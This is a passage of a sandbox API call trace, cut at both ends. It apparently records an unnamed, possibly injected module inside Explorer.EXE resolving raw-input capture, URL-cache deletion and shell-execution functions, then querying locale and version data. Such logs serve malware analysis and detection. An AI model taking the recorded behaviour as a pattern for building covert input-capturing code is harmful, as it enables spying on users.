lpProcName="StringFromCLSID") returned 0x76aaeb17 [0039.447] GetProcAddress (hModule=0x76a90000, lpProcName="CoCreateInstance") returned 0x76ad9d0b [0039.448] GetProcAddress (hModule=0x76a90000, lpProcName="CoGetClassObject") returned 0x76ac54ad [0039.448] GetProcAddress (hModule=0x76a90000, lpProcName="CoUninitialize") returned 0x76ad86d3 [0039.449] GetProcAddress (hModule=0x76a90000, lpProcName="CoInitialize") returned 0x76aab636 [0039.449] GetProcAddress (hModule=0x76a90000, lpProcName="IsEqualGUID") returned 0x76b5041c [0039.449] IsBadReadPtr (lp=0x6df4118, ucb=0x14) returned 0 [0039.449] LoadLibraryA (lpLibFileName="comctl32.dll") returned 0x74110000 [0039.450] GetProcAddress (hModule=0x74110000, lpProcName="InitializeFlatSB") returned 0x741ef803 [0039.450] GetProcAddress (hModule=0x74110000, lpProcName="FlatSB_SetScrollProp") returned 0x741907d0 [0039.451] GetProcAddress (hModule=0x74110000, lpProcName="FlatSB_SetScrollPos") returned 0x74190894 [0039.451] GetProcAddress (hModule=0x74110000, lpProcName="FlatSB_SetScrollInfo") returned 0x741908c7 [0039.452] GetProcAddress (hModule=0x74110000, lpProcName="FlatSB_GetScrollPos") returned 0x741ef80e [0039.452] GetProcAddress (hModule=0x74110000, lpProcName="FlatSB_GetScrollInfo") returned 0x741908b6 [0039.452] GetProcAddress (hModule=0x74110000, lpProcName="_TrackMouseEvent") returned 0x741922d1 [0039.453] GetProcAddress (hModule=0x74110000, lpProcName="ImageList_SetIconSize") returned 0x741fb44e [0039.453] GetProcAddress (hModule=0x74110000, lpProcName="ImageList_GetIconSize") returned 0x741250df [0039.454] GetProcAddress (hModule=0x74110000, lpProcName="ImageList_Write") returned 0x74158b97 [0039.454] GetProcAddress (hModule=0x74110000, lpProcName="ImageList_Read") returned 0x74113eae [0039.454] GetProcAddress (hModule=0x74110000, lpProcName="ImageList_GetDragImage") returned 0x741fafbb [0039.455] GetProcAddress (hModule=0x74110000, lpProcName="ImageList_DragShowNolock") returned 0x741fb161 [0039.455] GetProcAddress (hModule=0x74110000, lpProcName="ImageList_DragMove") returned 0x741fb0f0 [0039.456] GetProcAddress (hModule=0x74110000, lpProcName="ImageList_DragLeave") returned 0x741fb12a [0039.456] GetProcAddress (hModule=0x74110000, lpProcName="ImageList_DragEnter") returned 0x741fb0b3 [0039.456] GetProcAddress (hModule=0x74110000, lpProcName="ImageList_EndDrag") returned 0x741fa177 [0039.457] GetProcAddress (hModule=0x74110000, lpProcName="ImageList_BeginDrag") returned 0x741fb021 [0039.457] GetProcAddress (hModule=0x74110000, lpProcName="ImageList_GetIcon") returned 0x7413af2e [0039.458] GetProcAddress (hModule=0x74110000, lpProcName="ImageList_Remove") returned 0x7413e333 [0039.458] GetProcAddress (hModule=0x74110000, lpProcName="ImageList_DrawEx") returned 0x741210fd [0039.459] GetProcAddress (hModule=0x74110000, lpProcName="ImageList_Draw") returned 0x741ac687 [0039.459] GetProcAddress (hModule=0x74110000, lpProcName="ImageList_GetBkColor") returned 0x7412e8d2 [0039.460] GetProcAddress (hModule=0x74110000, lpProcName="ImageList_SetBkColor") returned 0x74190183 [0039.460] GetProcAddress (hModule=0x74110000, lpProcName="ImageList_Add") returned 0x74168fa1 [0039.461] GetProcAddress (hModule=0x74110000, lpProcName="ImageList_SetImageCount") returned 0x74165249 [0039.461] GetProcAddress (hModule=0x74110000, lpProcName="ImageList_GetImageCount") returned 0x7411a8b9 [0039.462] GetProcAddress (hModule=0x74110000, lpProcName="ImageList_Destroy") returned 0x74126471 [0039.462] GetProcAddress (hModule=0x74110000, lpProcName="ImageList_Create") returned 0x74123c75 [0039.462] IsBadReadPtr (lp=0x6df412c, ucb=0x14) returned 0 [0039.462] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76ca0000 [0039.463] GetProcAddress (hModule=0x76ca0000, lpProcName="EnumDisplayMonitors") returned 0x76cb34a3 [0039.463] GetProcAddress (hModule=0x76ca0000, lpProcName="GetMonitorInfoW") returned 0x76cb33e7 [0039.464] GetProcAddress (hModule=0x76ca0000, lpProcName="MonitorFromPoint") returned 0x76ca94c9 [0039.464] GetProcAddress (hModule=0x76ca0000, lpProcName="MonitorFromWindow") returned 0x76cb3622 [0039.464] IsBadReadPtr (lp=0x6df4140, ucb=0x14) returned 0 [0039.464] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x76f70000 [0039.465] GetProcAddress (hModule=0x76f70000, lpProcName="memset") returned 0x76f79790 [0039.466] GetProcAddress (hModule=0x76f70000, lpProcName="memcpy") returned 0x76f79910 [0039.466] IsBadReadPtr (lp=0x6df4154, ucb=0x14) returned 0 [0039.466] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x759e0000 [0039.467] GetProcAddress (hModule=0x759e0000, lpProcName="ShellExecuteW") returned 0x759f3c71 [0039.467] GetProcAddress (hModule=0x759e0000, lpProcName="Shell_NotifyIconW") returned 0x75a001c1 [0039.467] IsBadReadPtr (lp=0x6df4168, ucb=0x14) returned 0 [0039.467] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x75650000 [0039.468] GetProcAddress (hModule=0x75650000, lpProcName="FindNextUrlCacheEntryW") returned 0x7568989c [0039.469] GetProcAddress (hModule=0x75650000, lpProcName="FindFirstUrlCacheEntryW") returned 0x7568978a [0039.469] GetProcAddress (hModule=0x75650000, lpProcName="FindCloseUrlCache") returned 0x75698409 [0039.470] GetProcAddress (hModule=0x75650000, lpProcName="DeleteUrlCacheEntryW") returned 0x756a9573 [0039.470] IsBadReadPtr (lp=0x6df417c, ucb=0x14) returned 0 [0039.470] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76ca0000 [0039.471] GetProcAddress (hModule=0x76ca0000, lpProcName="GetRawInputData") returned 0x76d04c21 [0039.471] GetProcAddress (hModule=0x76ca0000, lpProcName="RegisterRawInputDevices") returned 0x76ca5b52 [0039.471] IsBadReadPtr (lp=0x6df4190, ucb=0x14) returned 0 [0039.471] LoadLibraryA (lpLibFileName="oleacc.dll") returned 0x72190000 [0039.472] GetProcAddress (hModule=0x72190000, lpProcName="AccessibleObjectFromWindow") returned 0x72192480 [0039.472] IsBadReadPtr (lp=0x6df41a4, ucb=0x14) returned 0 [0039.472] LoadLibraryA (lpLibFileName="OLEACC.DLL") returned 0x72190000 [0039.473] GetProcAddress (hModule=0x72190000, lpProcName="AccessibleChildren") returned 0x72195d25 [0039.473] IsBadReadPtr (lp=0x6df41b8, ucb=0x14) returned 0 [0039.475] GetCurrentThreadId () returned 0xc04 [0039.475] LocalAlloc (uFlags=0x40, uBytes=0x40) returned 0xf7320 [0039.475] SetThreadLocale (Locale=0x400) returned 1 [0039.476] GetVersion () returned 0x1db10106 [0039.476] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75900000 [0039.476] GetProcAddress (hModule=0x75900000, lpProcName="GetThreadPreferredUILanguages") returned 0x759422d7 [0039.477] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75900000 [0039.477] GetProcAddress (hModule=0x75900000, lpProcName="SetThreadPreferredUILanguages") returned 0x7593e627 [0039.478] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75900000 [0039.478] GetProcAddress (hModule=0x75900000, lpProcName="GetThreadUILanguage") returned 0x7593ae42 [0039.478] GetSystemInfo (in: lpSystemInfo=0x68ff880 | out: lpSystemInfo=0x68ff880*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x1, dwNumberOfProcessors=0x1, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x2d07)) [0039.479] GetCommandLineW () returned="C:\\Windows\\Explorer.EXE" [0039.479] GetStartupInfoW (in: lpStartupInfo=0x68ff85c | out: lpStartupInfo=0x68ff85c*(cb=0x44, lpReserved="C:\\Windows\\Explorer.EXE", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\Explorer.EXE", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x409, dwFillAttribute=0x4a0000, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x200202, hStdError=0x1f80)) [0039.479] GetACP () returned 0x4e4 [0039.479] GetCurrentThreadId () returned 0xc04 [0039.479] GetVersion () returned 0x1db10106 [0039.479] GetVersionExW (in: lpVersionInformation=0x68ff790*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x7725f879, dwMinorVersion=0x7725f99a, dwBuildNumber=0x81c28, dwPlatformId=0x68ff7f6, szCSDVersion="") | out: lpVersionInformation=0x68ff790*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0039.479] GetModuleFileNameW (in: hModule=0x6ba0000, lpFilename=0x68fd64c, nSize=0x20a | out: lpFilename="") returned 0x0 [0039.479] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x68fd436, nSize=0x105 | out: lpFilename="C:\\Windows\\Explorer.EXE") returned 0x17 [0039.479] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x70e0000 [0039.479] LoadStringW (in: hInstance=0x6ba0000, uID=0xffc9, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20 [0039.479] LoadStringW (in: hInstance=0x6ba0000, uID=0xffc8, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17 [0039.480] LoadStringW (in: hInstance=0x6ba0000, uID=0xffc7, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28 [0039.480] LoadStringW (in: hInstance=0x6ba0000, uID=0xffc6, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15 [0039.480] LoadStringW (in: hInstance=0x6ba0000, uID=0xffc5, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0039.480] LoadStringW (in: hInstance=0x6ba0000, uID=0xffc4, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0039.480] LoadStringW (in: hInstance=0x6ba0000, uID=0xffc2, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0039.480] LoadStringW (in: hInstance=0x6ba0000, uID=0xffc3, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0039.480] LoadStringW (in: hInstance=0x6ba0000, uID=0xffd5, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0039.480] LoadStringW (in: hInstance=0x6ba0000, uID=0xffde, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0039.480] LoadStringW (in: hInstance=0x6ba0000, uID=0xffd4, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0039.480] LoadStringW (in: hInstance=0x6ba0000, uID=0xffd0, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0039.480] LoadStringW (in: hInstance=0x6ba0000, uID=0xffd8, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0039.481] LoadStringW (in: hInstance=0x6ba0000, uID=0xffd7, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0039.481] LoadStringW (in: hInstance=0x6ba0000, uID=0xffe8, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0039.481] LoadStringW (in: hInstance=0x6ba0000, uID=0xffe9, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0039.481] LoadStringW (in: hInstance=0x6ba0000, uID=0xffea, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0039.481] LoadStringW (in: hInstance=0x6ba0000, uID=0xffe7, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0039.481] LoadStringW (in: hInstance=0x6ba0000, uID=0xffe5, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0039.481] LoadStringW (in: hInstance=0x6ba0000, uID=0xffe3, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0039.481] LoadStringW (in: hInstance=0x6ba0000, uID=0xffe2, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0039.481] LoadStringW (in: hInstance=0x6ba0000, uID=0xffe1, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0039.481] LoadStringW (in: hInstance=0x6ba0000, uID=0xffe0, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0039.481] LoadStringW (in: hInstance=0x6ba0000, uID=0xffff, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0039.481] LoadStringW (in: hInstance=0x6ba0000, uID=0xfffe, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0039.481] LoadStringW (in: hInstance=0x6ba0000, uID=0xfffd, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0039.481] LoadStringW (in: hInstance=0x6ba0000, uID=0xfff6, lpBuffer=0x68fd878, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0039.481] LoadStringW (in: hInstance=0x6ba0000, uID=0xffe4, lpBuffer=0x68fd878, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0039.481] GetVersionExW (in: lpVersionInformation=0x68ff78c*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x68ff78c*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0039.481] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75900000 [0039.482] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x13faf8 [0039.482] GetProcAddress (hModule=0x75900000, lpProcName="GetNativeSystemInfo") returned 0x7593be77 [0039.482] GetNativeSystemInfo (in: lpSystemInfo=0x68ff768 | out: lpSystemInfo=0x68ff768*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x1, dwNumberOfProcessors=0x1, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x2d07)) [0039.483] LoadStringW (in: hInstance=0x6ba0000, uID=0xff5f, lpBuffer=0x68fd75c, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7 [0039.483] LoadStringW (in: hInstance=0x6ba0000, uID=0xff42, lpBuffer=0x68fd75c, cchBufferMax=4096 | out: lpBuffer="Windows 7") returned 0x9 [0039.483] LoadStringW (in: hInstance=0x6ba0000, uID=0xfffc, lpBuffer=0x68fd870, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0039.483] LoadStringW (in: hInstance=0x6ba0000, uID=0xfffb, lpBuffer=0x68fd870, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0039.483] LoadStringW (in: hInstance=0x6ba0000, uID=0xfffa, lpBuffer=0x68fd870, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0039.483] LoadStringW (in: hInstance=0x6ba0000, uID=0xfff9, lpBuffer=0x68fd870, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0039.483] LoadStringW (in: hInstance=0x6ba0000, uID=0xfff8, lpBuffer=0x68fd870, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0039.483] LoadStringW (in: hInstance=0x6ba0000, uID=0xff89, lpBuffer=0x68fd870, cchBufferMax=4096 | out: lpBuffer="Invalid file name - %s") returned 0x16 [0039.483] LoadStringW (in: hInstance=0x6ba0000, uID=0xff68, lpBuffer=0x68fd870, cchBufferMax=4096 | out: lpBuffer="The specified file was not found") returned 0x20 [0039.483] GetVersionExW (in: lpVersionInformation=0x68ff780*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x10000, dwMinorVersion=0x2d070006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x01") | out: lpVersionInformation=0x68ff780*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0039.483] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75900000 [0039.484] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0039.484] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x71df40c, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", lpUsedDefaultChar=0x0) returned 19 [0039.484] GetProcAddress (hModule=0x75900000, lpProcName="GetDiskFreeSpaceExW") returned 0x7593de40 [0039.484] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x68ff656, nSize=0x105 | out: lpFilename="C:\\Windows\\Explorer.EXE") returned 0x17 [0039.484] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x68ff864 | out: phkResult=0x68ff864*=0x0) returned 0x2 [0039.484] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x68ff864 | out: phkResult=0x68ff864*=0x0) returned 0x2 [0039.484] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x68ff864 | out: phkResult=0x68ff864*=0x0) returned 0x2 [0039.484] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x68ff864 | out: phkResult=0x68ff864*=0x0) returned 0x2 [0039.484] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x68ff864 | out: phkResult=0x68ff864*=0x0) returned 0x2 [0039.484] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x68ff864 | out: phkResult=0x68ff864*=0x0) returned 0x2 [0039.484] GetThreadLocale () returned 0x409 [0039.484] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x68ff7a4 | out: lpCPInfo=0x68ff7a4) returned 1 [0039.484] GetThreadLocale () returned 0x409 [0039.485] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x68ff598, cchData=256 | out: lpLCData="2") returned 2 [0039.485] GetThreadLocale () returned 0x409 [0039.485] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0039.485] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x68ff4e4, cchData=256 | out: lpLCData="Sun") returned 4 [0039.485] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x68ff4e4, cchData=256 | out: lpLCData="Sunday") returned 7 [0039.485] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x68ff4e4, cchData=256 | out: lpLCData="Mon") returned 4 [0039.485] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x68ff4e4, cchData=256 | out: lpLCData="Monday") returned 7 [0039.485] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x68ff4e4, cchData=256 | out: lpLCData="Tue") returned 4 [0039.485] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x68ff4e4, cchData=256 | out: lpLCData="Tuesday") returned 8 [0039.485] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x68ff4e4, cchData=256 | out: lpLCData="Wed") returned 4 [0039.485] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x68ff4e4, cchData=256 | out: lpLCData="Wednesday") returned 10 [0039.485] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x68ff4e4, cchData=256 | out: lpLCData="Thu") returned 4 [0039.485] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x68ff4e4, cchData=256 | out: lpLCData="Thursday") returned 9 [0039.485] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x68ff4e4, cchData=256 | out: lpLCData="Fri") returned 4 [0039.485] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x68ff4e4, cchData=256 | out: lpLCData="Friday") returned 7 [0039.485] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x68ff4e4, cchData=256 | out: lpLCData="Sat") returned 4 [0039.485] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x68ff4e4, cchData=256 | out: lpLCData="Saturday") returned 9 [0039.485] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x68ff4e8, cchData=256 | out: lpLCData="Jan") returned 4 [0039.485] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x68ff4e8, cchData=256 | out: lpLCData="January") returned 8 [0039.485] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x68ff4e8, cchData=256 | out: lpLCData="Feb") returned 4 [0039.485] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x68ff4e8, cchData=256 | out: lpLCData="February") returned 9 [0039.485] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x68ff4e8, cchData=256 | out: lpLCData="Mar") returned 4 [0039.485] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x68ff4e8, cchData=256 | out: lpLCData="March") returned 6 [0039.486] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x68ff4e8, cchData=256 | out: lpLCData="Apr") returned 4 [0039.486] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x68ff4e8, cchData=256 | out: lpLCData="April") returned 6 [0039.486] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x68ff4e8, cchData=256 | out: lpLCData="May") returned 4 [0039.486] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x68ff4e8, cchData=256 | out: lpLCData="May") returned 4 [0039.486] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x68ff4e8, cchData=256 | out: lpLCData="Jun") returned 4 [0039.486] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x68ff4e8, cchData=256 | out: lpLCData="June") returned 5 [0039.486] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x68ff4e8, cchData=256 | out: lpLCData="Jul") returned 4 [0039.486] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x68ff4e8, cchData=256 | out: lpLCData="July") returned 5 [0039.486] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x68ff4e8, cchData=256 | out: lpLCData="Aug") returned 4 [0039.486] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x68ff4e8, cchData=256 | out: lpLCData="August") returned 7 [0039.486] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x68ff4e8, cchData=256 | out: lpLCData="Sep") returned 4 [0039.486] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x68ff4e8, cchData=256 | out: lpLCData="September") returned 10 [0039.486] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x68ff4e8, cchData=256 | out: lpLCData="Oct") returned 4 [0039.486] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x68ff4e8, cchData=256 | out: lpLCData="October") returned 8 [0039.486] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x68ff4e8, cchData=256 | out: lpLCData="Nov") returned 4 [0039.486] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x68ff4e8, cchData=256 | out: lpLCData="November") returned 9 [0039.486] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x68ff4e8, cchData=256 | out: lpLCData="Dec") returned 4 [0039.486] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x68ff4e8, cchData=256 | out: lpLCData="December") returned 9 [0039.486] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x68ff538, cchData=256 | out: lpLCData="$") returned 2 [0039.486] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x68ff538, cchData=256 | out: lpLCData="0") returned 2 [0039.486] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x68ff538, cchData=256 | out: lpLCData="0") returned 2 [0039.486] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x68ff730, cchData=2 | out: lpLCData=",") returned 2 [0039.486] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x68ff730, cchData=2 | out: lpLCData=".") returned 2 [0039.486] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x68ff538, cchData=256 | out: lpLCData="2") returned 2 [0039.486] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x68ff730, cchData=2 | out: lpLCData="/") returned 2 [0039.486] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x68ff4f0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0039.486] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x68ff4f0, cchData=256 | out: lpLCData="1") returned 2 [0039.486] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x68ff4f0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0039.486] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x68ff4f0, cchData=256 | out: lpLCData="1") returned 2 [0039.486] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x68ff730, cchData=2 | out: lpLCData=":") returned 2 [0039.486] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x68ff538, cchData=256 | out: lpLCData="AM") returned 3 [0039.486] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x68ff538, cchData=256 | out: lpLCData="PM") returned 3 [0039.487] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x68ff538, cchData=256 | out: lpLCData="0") returned 2 [0039.487] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x68ff538, cchData=256 | out: lpLCData="0") returned 2 [0039.487] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x68ff538, cchData=256 | out: lpLCData="0") returned 2 [0039.487] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x68ff730, cchData=2 | out: lpLCData=",") returned 2 [0039.487] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x76ee0000 [0039.488] GetProcAddress (hModule=0x76ee0000, lpProcName="VariantChangeTypeEx") returned 0x76ee4c28 [0039.488] GetProcAddress (hModule=0x76ee0000, lpProcName="VarNeg") returned 0x76f5c802 [0039.488] GetProcAddress (hModule=0x76ee0000, lpProcName="VarNot") returned 0x76f5ec66 [0039.489] GetProcAddress (hModule=0x76ee0000, lpProcName="VarAdd") returned 0x76f05934 [0039.489] GetProcAddress (hModule=0x76ee0000, lpProcName="VarSub") returned 0x76f5d332 [0039.490] GetProcAddress (hModule=0x76ee0000, lpProcName="VarMul") returned 0x76f5dbd4 [0039.490] GetProcAddress (hModule=0x76ee0000, lpProcName="VarDiv") returned 0x76f5e405 [0039.490] GetProcAddress (hModule=0x76ee0000, lpProcName="VarIdiv") returned 0x76f5f00a [0039.491] GetProcAddress (hModule=0x76ee0000, lpProcName="VarMod") returned 0x76f5f15e [0039.491] GetProcAddress (hModule=0x76ee0000, lpProcName="VarAnd") returned 0x76f05a98 [0039.492] GetProcAddress (hModule=0x76ee0000, lpProcName="VarOr") returned 0x76f5ecfa [0039.492] GetProcAddress (hModule=0x76ee0000, lpProcName="VarXor") returned 0x76f5ee2e [0039.493] GetProcAddress (hModule=0x76ee0000, lpProcName="VarCmp") returned 